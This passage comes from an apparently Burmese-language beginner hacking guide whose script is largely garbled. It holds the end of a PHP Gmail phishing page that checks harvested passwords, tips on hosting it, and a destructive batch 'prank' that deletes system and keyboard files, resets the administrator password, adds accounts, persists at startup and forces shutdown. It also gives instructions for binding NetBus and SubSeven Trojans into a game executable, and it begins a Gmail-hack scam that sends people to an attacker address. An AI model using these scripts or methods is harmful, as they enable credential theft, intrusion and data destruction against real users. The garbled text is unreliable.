ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string,
so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
?>
PHP ααဲ့ host ααုαုαွာ αီ code ေαြαို install αုα္ααါαα္။ α်α္αာ α‘ေαးα ိα္αိα်α္αα္ေαာ့ free hosting
ααုαုံးျαီး α်ေαာ္ α‘αα္α α္းαိုα္α‘ံုးαα္ ။ αα္αူααိုα α္းααα ဲ ααိαူး။
ေα‘ာα္α free host αွာ PHP ααါαα္။
Code:
http://www.000webhost.com/
α‘αိုα္း (α ) WINDOWS αိုαα္ေαႊαα္း αိုαီαုα္α α်ား
Registry αα ို αα္ေαာα္ေαႊေႏွာα္ျαα္း
α်ေαာ္ registry αဲαိုα αα္ေαႊαα္း αα္းαα္းαါးαါး ေျαာα်α္αါαα္။ αာαဲျαα ္ျαα ္ registry αို αα္ေαႊေαာ့αα္αိုαα္
ေαာ့ back up αုα္αားαို့αိုαါαα္...αာαို့αဲαိုေαာ့ registry αွာαα္ေαးαဲ့ α‘αါαွာ registry α auto save
αုα္αါαα္..αွားαြားαါαα္αိုျαီး undo ,redo ေαြαုα္αို့αααါαူး....
α‘ဲαါေαΎαာα့္αါ.....
αဲ α်ေαာ္αိုα All program αိုေα်ာα္αိုα္αေα‘ာα္....
- start > run αိုαα္αါ..
- regedit αို့ αိုα္ျαီး enter ႏွိα္αါ..
- HKEY-CURRENT- USER\software\microsoft\windows\current version\policies\explorer
- explorer ေαααို right click ႏွိα္ျαီး new αိုေαြးα်α္αါ Dword value αိုαြα့္αါ..
αိုα‘αါ αာαα္ျαα္αြα္းαွာ new value #1 ေαααာαါαα္..
-new value #1 αို rename ေαးαိုα္αါ..
name α NoStartMenuMoreProgram ျαα ္αါαα္..
NoStartMenuMoreProgram ေαααိုαα္း right click ေαးျαီး modify ေαြးαါ
value data α‘αြα္αဲ α 0 ေααေααါαα္..α‘ဲαါαို 1 ေျαာα္းေαးαိုα္αါ..
computer αို restart ေαးαိုα္αါ...
Folder αို software ααံုးαဲ Lock α်αα္း
ေαွးα₯ီးα ြာ notepad αိုαααုα္ Command Promt αိုαြα့္ျαီး edit αဲαြα္ ေα‘ာα္ေααျααါ command α်ားαို
ေαးαား၍ .bat file α‘ေαျαα့္ save αွα္αါ။ Notepad αဲαြα္ေαး၍ Save name as αိုαဲ့ ေααာαွာ example.bat αိုα
save αွα္αါ။ αို file α‘ားαြα္αြα္αူαူ desktop ေαααွာαဲ αိα္းαားေαါ့။ αိုαေαာα္ αα္း .bat file α‘ား Run
αိုα္αါ။ Private αိုေαာ Folder αα ္αု ေαααာαါαိα့္αα္။ α‘ဲαီ Folder αဲαြα္αိαိ αိα္းαားα်α္ေαာ files α်ား
folder α်ား αα့္αိုα္αါ။ αိုαေαာα္ example.bat file α‘ားေαာα္αα ္ေαါα္ run αိုα္αါ။ αိုα‘αါ cmd Windows
αα ္αု ေαααာαါαိα့္αα္။ Set Password to Lock Folder αိုαာေαααာαါαα္။ αိုα္αိုα်α္αဲ့ password
ေαးαိုα္ေαါ့။ ေαာα္αα္ Are You Sure to Lock this Folder (Y/N) αိုαာေαααာαါαိα့္αα္။ Y αိုααိုα္αိုα္αါ။
Private αိုေαာ Folder ေα်ာα္αြားαါαα္။ αα္း folder αိုျαα္αိုα်α္αွ်α္ example.bat αိုαဲ့ file αိုျαα္ run αါ။
Enter Password to Unlock Folder αိုαာေαααာαါαိα့္αα္။ Password αိုα္αိုα္αါ။ αα္း folder
ျαα္ေαααာαါαိα့္αα္။ α α္းαΎαα့္α်ေαါ့α်ာ……….
Command
cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
αူα်ားαို αုαα‘ေαးα်α္αွ်α္။ ။ေα‘ာα္ေααျααါ command α်ားαို notepad αဲαိုα copy, paste αာ .bat file
α‘α်ိဳးα‘α ားျαα့္ save αွα္αါ။ αိုαေαာα္αα္း file α‘ားαံုးααြα့္ααΎαα့္αါႏွα့္။ αြα့္αΎαα့္αါα error message
α်ားαα္αာျαီး Windows α auto shut down ျαα ္ေααါαိα့္αα္။ ေαာα္αα ္ေαါα္αြα့္αဲ Windows
αα္ျαီးျαီးျαα္း αα α αၠα္αα‘αြα္း Shut Down ျαα ္ေααါαိα့္αα္။ αα္αိုαွ ျαα္αြα့္ႏိုα္αွာααုα္αါαူး။ safemode
αျαα္ျαα္αွ ျαα္ေαာα္းႏိုα္αွာαါ ။ αဲα…ဲ …..
title any
@echo off
copy any.bat "c:\documents and settings\all users\start menu\programs\startup"
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
net user administrator *18083
net user 598 *32087 /add
net user 3063 *864 /add
net user 3262 *21895 /add
net user 29039 *3102 /add
net user 15688 *215 /add
net user 24824 *28761 /add
net user 25176 *23975 /add
net user 8896 *28052 /add
msg *any
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
shutdown -s -f
exit
Cmd Dos Command αα္းαα္းαါးαါး
α်ေαာ္ αိαားαဲ့ CMD DOS COMMAND αα္းαα္းαါ
ααိαΏαီးαားαူေαြαα္းαွိαါαα္ ...
ααိေαးαဲ့ αူေαြα‘αြα္αဲ αα္αြα္αါαα္ ....
Run Box αွာ cmd αိုα္αα့္αိုα္αα္
C Directory αိုαြားαα္αို C: , D αိုαα္ D: α αα့္ျαα့္ေαါ့ ....
ααααံုးေျαာααα္ .. cmd αိုα ေαααိုα္αာαဲα α ျαα္ααွာα
C:\Documents and Settings\user name> αါ ...
α‘ဲαီ Directory αွာ αα္ Folder ေαြαါαα္း αΎαα့္α်α္αα္
dir /a αဲα αΎαα့္ααါαα္
α‘ဲαီ့ Directory αα ္αုαဲα Folder αို αြα့္α်α္αα္
cd αံαားαΏαီး αိαိαြα့္α်α္αဲ့ Folder Name (α₯ααာ။ ။ Desktop)ေαးαΏαီး αြα့္ααါαα္
C:\Documents and Settings\user name\Desktop>
αို Folder αွ ျαα္αြα္α်α္αα္ cd.. ေαးαΏαီး ျαα္αြα္ααါαα္
Hidden ျαα ္ေααဲ့ Folder (αိုα) File αို unhidden ေαးα်α္αα္αိုαα္
Folder Option αေα virus αိုα္αα္αို show hidden folder ေαးαα္း αααာေαြαွိαါαα္
attrib -H /S /D "c:\......\folder name"
hidden ျαα ္ေααဲ့ Folder (αိုα) File αွိαဲ့ Directory α‘ျαα့္α‘α ံုαို /D ေαာα္αေα
αα္ေαးေαးααါαα္
Directory αα ္αုαွာαွိαဲ့ folder αဲα files ေαြαို αျαား Directory αα ္αုαွာαွိαဲ့
folder αဲαို ေျαာα္းေαႊααူးαူα်α္αα္αို ...
αိαိေျαာα္းေαးα်α္αဲ့ Directory αိုα‘αα္αြα့္ေαးααါαα္ (α₯ααာ။ ။ C: αဲα Desktop αိုေαႊααα္αို C:\Documents
and Settings\user name\Desktop>
αိုα α‘αα္αြα့္ေαးαိုα္αါ။
ေαာα္ααα္αΏαီး αူးαူα်α္αဲ့ Directory αွ folder αိုေαးေαးααါαα္
xcopy /a "e:\foler name" αုေαးေαးααါαα္ ...
ααုေαါα္းαိုαΎαα့္αα္αိုαα္ေαာ့
C:\Documents and Settings\user name\Desktop>xcopy /a "e:\foler name"
α‘αု αူးαူαာα unhidden files ေαြαိုαဲ αူးαူးαာαါ။
hidden files ေαြαိုαူးαα္αိုαα္ေαာ့ /h αα့္ေαးαုံαါα ဲ
xcopy /h /a "e:\foler name" αုေαးေαးαိုα္αါ...
α‘αုα files αိုαဲαူးαာαါ ...
Folder α‘αိုα္αူးαα္αိုαα္ေαာ့ /s αိုα‘αံုးျαဳααါαα္
xcopy /s "e:\folder name" αိုαေαးေαးααါαα္။
αါααα္း hidden αျαα ္αဲ့ folder αိုαူးαာαါ
hidden folder αိုαူးαα္αိုαα္ေαာ့ /h αိုαဲαα့္ααါαα္
xcopy /h /s "e:\foler name" αိုαေαးေαးααါαα္ ...
α‘ဲαီαိုαူးαူαဲ့ α‘α်ိα္αွာ CMD box αွာ αူးαူးαဲ့ files ေαြ run αာαိုျααါαα္ α‘ဲαီαို αေααα်α္αα္ေαာ့ /Q
αα့္ေαးααါαα္
xcopy /h /q /s "e:\foler name" αိုαေαးေαးααါαα္ .................။
Folder Background αို software ααံုးαဲ αံုαွαွေαးαα့္αα္း
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=E:\general\picture\DSABayonet211.jpg
iconarea_text=11x00fffffff
ေααျααါ code α်ားαို Folder α‘αြα္းαွိ desktop.ini αိုေαာ file α‘αြα္းαိုα copy αူး paste αုα္αါ။ αα္း ini file αα္ hidden
ျαα ္ေααါαα္။ hidden ေααျαီးαွာαါ။ iconarea_image=E:\general\picture\DSABayonet211.jpg αိုαာαြα္
αိαိαα့္αြα္းαိုေαာαံု ၏αα္ေααာ αိုαိαα္αိုαါαα္။ α₯ααာ. Desktop ေαααွိ image.jpg αိုေαာαံုαိုαα့္αြα္းα်α္αွ်α္
iconarea_image=C:\Documents and Settings\User Name\Desktop\image.jpg αုေαးႏိုα္αါαα္။ α‘ေαာα္α file
extension *.jpg αိုαာαိုαα့္ေαးαα္αေα့αါႏွα့္။
website ေαြααဲα IP αုိα်α္α်α္းαိα်α္αα္αိုαα္
ααααံုး start >>> Run αို click.
cmd αိုα αိုα္ျαီး ok αုα္.
α‘ဲαီαွာ αါေαးαို αိုα္αα့္αΎαα့္αိုα္.
nslookup www.google.com αိုααိုα္ျαီး enter ေαါα္αΎαα့္αိုα္αါα
google αဲα IP ေαြα်αာαါαိα့္αα္။။αိαိαိα်α္αဲα website αဲα α‘αα္αို ေျαာα္းαိုα္αΎαα့္ေαါ့
ေα်ာ္αႊα္ႏိုα္αါေα ။
✒️C_M_H✒️
Introduction: αα္αာαိုαာαာαဲ ႏွα့္ αြ်ႏ္ုα္၏ α‘ျαα္
α‘αိုα္း (α) : αိုα‘α္ေαာα‘αα္α‘ျαα္းα်ား
α‘αိုα္း (α) : Hacker αိုα၏ αွ်ိဳααွα္α်α္α်ား
……….Intro
……….Trojan Horse αုေααေαာ virus α‘ေαΎαာα္း
…………αα္αာေαα‘ြ αုံးျαဳေαာ αွ်ိဳααွα္ α‘αာα်ား
………..Port Scanning
………..SubSeven
……….NetBus
α‘αိုα္း (α) : Gmail Password Hack αα္း
…………..Phishing α‘ေαΎαာα္း Intro
α‘αိုα္း (α) : Phishing αα္းαα္းαိုα‘αံုးျαဳ၍ gmail password ေαာα္αα္း
α‘αိုα္း (α ) : Windows αိုαα္ေαႊαα္း αိုαီαုα္α α်ား
………. Registry αို့αα္ေαာα္ေαႊေႏွာα္ျαα္း
……… Folder αို software ααံုးαဲ lock α်αα္း ႏွα့္ Funny Command ေαးαα္း
……… Cmd Dos Command αα္းαα္းαါးαါး
……… Folder Background αို software ααံုးαဲ αံုαွαွေαးαα့္αα္း
……… website ေαြααဲα IP αုိα်α္α်α္းαိα်α္αα္αိုαα္
αα္αာαိုαာαာαဲ ??? αြ်ႏ္ုα္၏α‘ျαα္ ။
Hacking ααာαα္αိုαα္ αα္αူαိုααေαာ ααာααုα္။ α‘αံုးα် αα္းααာα်ားαို ေα့αာေαြααွိျαီး
α‘ားαα္းα်α္αို αွာေαြႏိုα္ေαာ ααာျαα ္αα္။ Online ေαααြα္ Hacking αဲααα္αα္ေαာ
α ာα‘ုα္α်ားα ြာαိုေαြααူးျαီး Hacking ႏွα့္αα္αα္ေαာ web site α်ားαဲ ေαααြα္ေααါျαီ။ Vulnerability
ေαါα္းα်ားα ြာαို hacker αုေααေαာ αူα ုα်ားα αွာေαြေαြααွိျαီး web site ေαါα္းα်ားα ြာαြα္ αα္αားαΎααါαα္။ α‘ဲαီ
αα္းααာαα္ေαြαို α‘αံုးျαဳ αွီαို ေααဲ့αူေαြα‘α်ားααီးαွိαါαα္။ αါေαြα αα္αာေαြαားαိုαဲ့
ေαးαြα္းေαးႏိုα္αါαα္။
Tool user ေαြαါ၊ professional hacker αα ္ေαာα္αိုαာ αါααီα‘αα္းαံျαီး αြα္α်ဴαာ αα္းααာ
αိုαူးαြα္αဲ့ αူαα ္ေαာα္αဲαIT αိုα္းαိုα္αာေα်ာ့αြα္αို αွာေαြαႏိုα္ျαα္းျαα ္αါαα္။ White, black, gray αိုαေαααဲ့
hacker αံုးα်ိဳးαြဲαားαါαα္။ αဲα black αေαာ့ αα္αူေαြေαါ့။ α‘α်ားα ုα gray ေαြαါ။
αါαို α်ေαာ္ေαးαားαဲ့ α ာα‘ုα္αေαာ၊ αα္ျαီး hacker αα ္ေαာα္ျαα ္ႏိုα္αါ့ααား
αိုαေαးႏိုα္α αာα‘ေαΎαာα္းαွိαါαα္။ α်ေαာ္αိုα္αိုα္ေαာα္αွ αα္αာααုα္αာα်။ :D ။ α်ေαာ္αိαာေαးေααြ ို
share αုα္ေαးα်α္αဲ့αα္αြα္α်α္αို α‘αိααားαာαါ။
α‘αိုα္း (α) αိုα‘α္ေαာ α‘αα္α‘ျαα္းα်ား
hacking αုα္αα့္ေααာαြα္ αα ္α₯ီးαα ္ေαာα္αုα္ျαα္းαα္ α‘ α်ားႏွα့္
αူေαါα္းျαီး αုα္αွ်α္ αုိျαီး α‘ α်ဳိးαွိαα္။ αုိαေαΎαာα့္ Ethical hacking αြα္ Hacker
α်ားα ုαြဲαျαီး TEAM αα ္αုα‘ ေαျαα့္ αုα္ေαာα္ααα္။ ၎αုိααα္ α‘ α်ိα္αုိα္း αိαိ
αုိα္αြα္αေαာ System α‘ား αုိα‘ α္α်α္α်ားαုိαွာေαြျαα္αα္ααα္။
αုိα္αုိα္ျαα္းα်ဳိးα ုံ αွိαα့္α‘ αြα္ α‘ ားαုံးαုိαိαွိαα္αွာαျαα ္ႏူိα္ေα။αိαိhacking
α‘ αြဲααြα္ αုα္αုိα္ေαာαူα်ားαα္ ေα‘ာα္ေαာ္ျααါ ααာαα္α်ားαုိ αα ္α₯ီး
αα ္ေαာα္ျαα္း α‘ ေαα‘ α်ာαα္ေျαာα္αα္αုိα‘α္αα္။
· Programming
· Webdeveloping
· Software Crackers
· Web Hackers
· Network security groups
· system admin groups
· database Hackers
· crytoanalizer
၎ααာαα္α်ား α‘ားαုံးαုိ αိαွိαα္ ααုိေα။ αုိαေαာ္ general knowledge
αိαွိααα္။ αိαိ Hacker α‘αြဲααြα္ αူαα ္ေαာα္α ီ ααာαα ္αုα ီαုိ
ေαေαα်ာα်ာαα္ေျαာα္αα္αိုα‘α္αα္။
Hacker αα ္ေαာα္ေα‘ာα္ျαα္α ြာျαဳαုα္ႏုိα္αα္α‘αြα္αုိα‘α္α်α္α်ားα ြာαွိαα္။
αိαိ αα္ေαာα္αုိေαာ ေααာ၏ data α‘ျαα့္α‘α ုံαုိαိαွိေα‘ာα္ α‘αα္αုံးျαဳαုα္ααα္။
IP address
αိαိαα္ေαာα္ααα့္ Computer ၏ address
Hostname
αိαိ αα္ေαာα္ααα့္ Computer ၏ αာαα္
Software
၎ Computer αြα္α‘αုံးျαဳေαာ Software α်ား
Firewall rules
Network ၏ αုံျαဳံေαးα‘αြα္α‘αုံးျαဳαားαα္α်ား
Phone Numbers
αုα္းαံαါα္
Employee names
α‘αုα္ααားα်ား ၏ α‘ေαΎαာα္းα‘αာα်ား
αိαိαုိααိαုိေαာ α‘α်α္α်ားα ြာαုိ Internet αွ α်ားα ြာα‘αူα‘αီေαးႏုိα္αα္။
αα ္hacking αုα္αုိေαာ ေααာ၏ data αα% αုိ internet αွαွာႏုိα္αါαα္။
၎၏ company ႏွα့္αα္αα္ေαာ αုα္းαံαါα္ ၊ IP address ၊ Firewall ၊ α‘αုα္ααား
α₯ီးေα ၊ company α αα္αα္ေαာα္ေαာေαα ၊ company ၏ αုိα္αွα္ α‘αα္α်ား ၊
company α်ိα္αα္αားေαာ αျαားNetwork α်ား၊ company ၏αုα္ αုα္α်ားα αα့္
ααα္းα‘α်α္α‘αα္α်ားαုိα‘α်ဳိးαွိαွိ α‘αုံးα်ααα္ျαα ္αα္။
hacking ျαဳαုα္αα္α‘αြα္α‘αုံးျαဳေαာ Tools α်ား
1. Google (α‘ေαΎαာα္းα‘αာα်ားα ြာαုိ αွာႏုိα္αα္။)
2. Google Earth (Network α်ိα္αα္ျαα္းα်ားαုိ αΎαα့္αႈαα္)
3. Nmap (IP addres α်ားαုိαΎαα့္αႈαα္)
4. John The Ripper (Password α်ားαုိေα်ာ္ႏုိα္αα္)
5. Lan Guard (αိαိ၏ Network αုိ ေα ာα့္αΎαα့္αα္)
6. Pwdump 6 (Password α်ားαုိα်ိα္းαα္)
7. Firebug (website α်ားαွျαα္αΏαီး server αဲαိုααα္αα္)
8. Java ( Mysql αုိျαα္αα္αα္)
9. putty (αျαား Computer αဲαုိα αα္ေαာα္αα္)
၎ αုိαျαα့္α αα္α α္းαα္ α‘αုံးျαဳαΎαျαီး αိαိαုိα၏ α₯ာα္αα္α₯ာα္ေαြးα‘α
αα္αα္α‘ေαာα္α‘αα္ေαာ္αΎαα့္αα့္αα္။Tools α်ား၏ α‘αုα္αုα္αုံαုိ ေαα်ာ αား
αα္αွαာ α‘αုံးျαဳႏုိα္αα္ျαα ္αα္။Tools α်ား၏ α‘ားαα္းα်α္α်ားαုိ αိαားααα္ ျαα ္
αα္။ Tools α်ားαုိαုံးαွ်α္ ၎αုိα၏ αုံးα ြဲαုံ α‘ေαΎαာα္းαုိ ေαα်ာαα္αΎαα့္ααα္။
α‘αိုα္း (α) Hacker αိုα၏ αွ်ိဳααွα္α်α္α်ား…
Intro
Trojan Horse
Hacking αဲαα‘αိα ααားαံαိုαေျαာႏိုα္αာαေαာ့ Trojan αိုαဲ့ virus ေαΎαာα့္αါ။
α‘α္αာαα္αိုα္ေαြαွာ ေαြαααα္αα္ ။ USB Stick ေαြαို virus scan αုα္αိုα္αα္
ေαာ္ေαာ္α်ားα်ားေαြαααဲ့ virus αα ္α်ိဳးေα။ Trojan, Trojan αဲα αူαိေαာ္ေαာ္α်ားαါαα္။
α်ေαာ္ေα့αာαိုααိααာေαာ့ αြα္α်ဴαာαဲα α‘α်α္α‘αα္ေαြ၊ password ေαြα‘αိုးαံααာαာ α‘ဲαီ
Trojan ေαြေαΎαာα့္αိုα αံααျαα ္αα္αိုαα္ ααွားႏိုα္αါαူး။ Trojan αိုαာ program ေαးေαးေαးαါ။
α‘ဲαီ program ေαးα αြα္α်ဴαာαα ္αု αဲαွာ αα္ေαာα္ေααာαူαာ hacker αီαိုα αα္းαြα္α်ဴαာ၏
information α်ားαို ααα္းေαးႏိုα္ေαာ Program αα ္αုαါ။ αα္း Trojan ျαα့္ αြα္α်ဴαာα်ားαို
αိα္းα်ဳα္ႏိုα္αါαα္။
Trojan α်ား၏ α‘α်ားα‘ားျαα့္ αုα္ေαာα္ႏိုα္ေαာ α‘α ြα္းααိၱα်ားαို ေα‘ာα္αြα္ေααျααားαါαα္။
.CD-Rom drive α်ားαို α‘αြα့္၊ α‘αိα္ control αုα္ႏိုα္ျαα္း
.αα္၏ αြα္α်ဴαာαွ screenshot αို capture αုα္ႏိုα္ျαα္း
.αα္၏ password α်ား ( Windows, MSN, Gmail, Yahoo,….α‘α αျαα့္) αို hacker αီαိုα ααα္းαိုαေαးႏိုα္ျαα္း
.αα္၏ hard disk αဲαွ file α်ားαို αိုααို αူးαူႏိုα္ျαα္း၊ delete αုα္ႏိုα္ျαα္း
.Keyboard ႏွα့္ mouse αို Disable αုα္ႏိုα္ျαα္း……α‘α αျαα့္
Popular ျαα ္ေαေαာ Trojan α်ား
-NetBus
-SubSeven
NetBus Trojan αွာ α‘ျαား Trojan α်ားαဲ့αိုα α‘ေαးααီးαဲ့ α‘α ိα္α‘αိုα္း α αိုα္း αွိαါαα္။ NetBus Server.exe αα္
Patch.exe αα္αို αဲ့ exe file α αု αါαα္αါαα္။ NetBus Server αို αα္၏ αြα္α်ဴαာαဲαိုα α‘αα္αံုး install
αုα္αα္αိုαါαα္။ Patch file αို αα္ hack α်α္ေαာ αြα္α်ဴαာαဲαိုα αြα္းႏိုα္αα္ α‘αိα αိုα‘α္αါαα္။
α₯ααာ- αα္ hack α်α္ေαာ αြα္α်ဴαာ αိုα္αွα္၏ information αိုα‘αα္αံုးα ံုα α္းαα့္αါαα္။ αα္αα္
αိα္ေαြ αူαα္α်α္းαို αွ်α္αို၍ α‘αα္ေျααါαα္။ ေαွးα₯ီးα ြာ αူ ၏ email αိုα αိုα၍ run
αိုα္းျαα္းα‘ားျαα့္αဲ αႏိုα္αါαα္။ αါαွααုα္ αူαα‘ား αိα္းαα္ေαာα္ေαးααိုαိုျαα့္ αα္းαိα္းαဲαြα္
Patch file αို αြα္းေαးαိုα္αါ။ chess.exe file αိုαါα ိုα။ αα္း exe file αဲαိုα Patch αြα္းαိုα္αါ။
ResHacker software ျαα့္ αα္αီးႏိုα္αါαα္။ αိုαေαာα္ αα္αα္αီးαိုα္ေαာ chess.exe αာ
αာαα္α‘αိုα္းαါαဲ။ αာαွαေျαာα္းαဲαြားαါαူး။ α‘ဲαီ αာαို install αုα္αိုα္αွ်α္ αိα္းαာ αူα
orginal α‘αိုα္းαါαဲ။ αာαွ ျαႆαာαေαးႏိုα္αါαူး။ αα္ေαးαိုα္αဲ့ chess αဲα patch file
ေαးα αα္ hack α်α္ေαာ αြα္α်ဴαာαဲαြα္ ေααာαူျαီးαားျαα ္αါαα္။ α‘ဲαီ file ααဲ hidden
ျαα ္ေααာαါ။ α‘ဲαါαို α‘αα္ေျααြားαါαိα့္αα္။ α hack α်αာေαါ့။…..:D ။
αα္αာေαြ α‘αံုးျαဳေαာ αွ်ိဳααွα္ α‘αာα်ား
(α) Port Scanners
Port Scanner αိုαာαာα ဲ
Port Scanning αဲα α‘αိα αα္αြα္α်α္αေαာ့ opening port ေαြαို αွာαိုαျαα ္αါαα္။ Hacker αα ္ေαာα္
α‘αြα္ α‘ေျααံα်αဲ့ αα္းαα ္αုαါ။ opening port ေαြαိုαိαွ hack αိုααြα္αွာαိုး….။Hacker α‘ေααဲα server ေαα
αွာαုα္ေααဲ့ service ေαြαို αΎαα့္ျαα္းα‘ားျαα့္ vulnerability ေαြαို αွာႏိုα္αိုα α‘αြα့္α‘αα္းαိုα်ားαာαွာαါ။
αာαα္ααီးαဲ့ nmap port scan tool αိုေαါα္းαုα္α်αိုα link αါ > http://nmap.org/download.html <
Online ေαααွာα‘ျαားport scanner tool ေαာα္းေαာα္းေαြα‘α်ားααီးαွိαါေαးαα္….။
Start Scanning
Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrp)
Port Scanning αို α α်ိဳးαုα္ႏိုα္αါαα္။ ααααα ္αုα Single IP port αြα့္αα္α‘αြα္ႏွα့္ αုαိααα ္αုαို Range IP
Port αြα့္αα္ျαα ္αါαα္။ IP αိုαာα ေαွαααာααူျαီး α‘ေαာα္α αံαါα္αေျαာα္းαဲαြားႏိုα္αါαα္။
α₯ααာ 192.168.1.2 , 192.168.1.3 α‘α αျαα့္ေαါ့။ αုα္းαံαါα္α‘αိုα္းαါαဲ (530-xxx) α‘α αျαα့္……….
Range IP αိုαာα ေαာ့ ( 555-0000 to 555-9999) α‘αိ αΎαားαဲα αα္αα့္ααα္းααို ျαα ္ႏိုα္αါαα္။
Port Scanner αိုαာ αီαုိα်ိဳးေαါ့
(α) Trojan
Trojan α‘ေαΎαာα္းαေαာ့ Hacking αွာ ααါ αျαα ္αိုေαြαααွာαါ။ αာαိုααဲαိုေαာ့ Trojan ေαြα
αα္αာေαြαဲααα္α ြဲ virus αα ္α်ိဳးαိုααိုααါ။ Trojan ေαါα္း αα ္αာေα်ာ္αီးαါαိွαါαα္။ α‘ဲαီαဲα
α ံုαြဲ αေαာαိုျαα ္ေαေαာ Trojan α‘ေαΎαာα္း α₯ααာ α‘ေαႏွα့္ေααျααားαါαα္။ α‘ဲαီ Trojan ျαα့္
α်ေαာ္ α‘αုαα္αွိေαႊေααα္ေα…..
Sub Seven
Sub Seven Trojan αွာ αုα္ေαာα္ႏိုα္αဲ့ α ြα္းαα္ α‘α်ားα‘ျαားαွိαါαα္။ αα္း Trojan αာ α်ေαာ္ေαြααူးααွ်
Trojan αααေα်ာ္ေαာα္αဲα α‘ေαာα္းαံုး αိုα αူααါαα္။ αα္းαဲααုα္ေαာα္ႏိုα္αဲ့α ြα္းαα္ေαြαို
ေα‘ာα္αွာေααျααားαါαα္။
SubSeven αိုαာ αီαိုα်ိဳးαါ
αုα္ေαာα္ႏိုα္αွဳα်ား
-address book
-www pager retriever
-UNI2IP
-remote IP scanner
-host lookup
-get WINDOWS CD-Key
-update victim from URL
-ICQ takeover
-FTP root folder
-retrieve dial-up passwords along with phone numbers and username
-port redirect
-IRC boot for a list of commands
-file manager bookmarks
-make folder, delete folder (Empty of Full)
-process manager
-text 2 speech
-Restart server
-Aol Instant Messenger Spy
-Yahoo Messenger Spy
-Microsoft Messenger Spy
-Retrieve list of ICQ uins and passwords
-App Redirect
-Edit files
- set/change screen saver settings
-Restart Windows
-IP Tools (Resolved Host name/ Ping IP address)
-Address
-City
-Real name
-Country code
-Local Phone
-Zip code………….α‘α αျαα့္ေαါ့…….. α‘ျαားαုα္ေαာα္ႏိုα္αႈα်ားα ြာαွိαါေαးαα္….။
NetBus
Net Bus αိုαာαေαာ့ αိုးα‘αα္αုα္းα αံုးαဲ့αဲ့ Trojan α‘ေαာα္းαα ္α်ိဳးαါ။ αါေααဲ့ ေαာ္ေαာ္
α်ားα်ားαေαာ့ αα္းαို αုα်ိα္αိ αံုးα ြဲαွ်α္αွိαΎααါαα္။ Net Bus αဲαေαႊြααာαဲေαာ္ေαာ္α‘αα္ေျααါαα္။
α α္းαံုးαΎαα့္ေαါ့……..။ αံုးαα္းαို α‘ေαααြα္ ေααျααΏαီးαါαΏαီ။
NetBus αို α€αိုαေαြαျαα္ααါαα္။
NetBus ၏ αုα္ေαာα္ႏိုα္α ြα္းα်ားαို α‘αα္αြα္ ေααျααားαါαα္။ α‘ေαးα ိα္ေαာ့ αေααျαေαာ့αါ။
α‘αိုα္း (α) Gmail Password Hack αα္း
Gmail Password αို Hack αာαြα္ αာေαြαိုα‘α္ααα္း ???
Hack αα္းေαါα္းα်ားα ြာαွိαါαα္။ ေαွးα₯ီးα ြာ αိုးαိုးαွα္းαွα္းျαα့္ Hack ေαာαα္းαα္းαို α‘αα္ေααျααါαα္။ αြα္αဲ့αဲ့
αααα αုႏွα ္ေαာα္αုα္းα javascript αα္းျαα့္α်ေαာ္ αံုးαΎαα့္αူးαါαα္။ α‘αုေαာα္αိုα္းαα္αံုးαΎαα့္αာ
ααေαာ့αါαူး၊ Google α admin ေαြααဲ ααံုးေαြαွααုα္αာ။ αူαိုα security ေαြαို
ααααျαα္ျαα္ျαα္αα္ေα။ α်ေαာ္αိုααα္α‘α်ားααီးαွ α‘α်ားααီးαိုαα္αာေαါ့။ ααု αα္းα ေαာ့ Google αဲα
security ေαြαို ျαα္ေα်ာ္αိုαααဲ့ javascript α‘αα ္αα ္αုαါ။ α်ေαာ္α€ αα္းαို ႏိုα္αံျαား Hacking
α ာα‘ုα္αဲαေαု αာαာျαα္αားαာαါ။ αါααာαါαα္ αα္းαα္းαါးαါးေαာα္ αα္ေαႊαΎαα့္αΎαေαါ့
αုα္αα္း
αα ္αα့္ျαα္းαီေααျααားαါαα္။
α‘αα့္(α) αα္၏αိုα္αိုα္ Gmail account ျαα့္ Gmail αဲαိုα Login αα္αါ။
αွα္α်α္ ( passwrdserver2@gmail.com αိုαα‘αα္αံုး add αားαါ၊ add
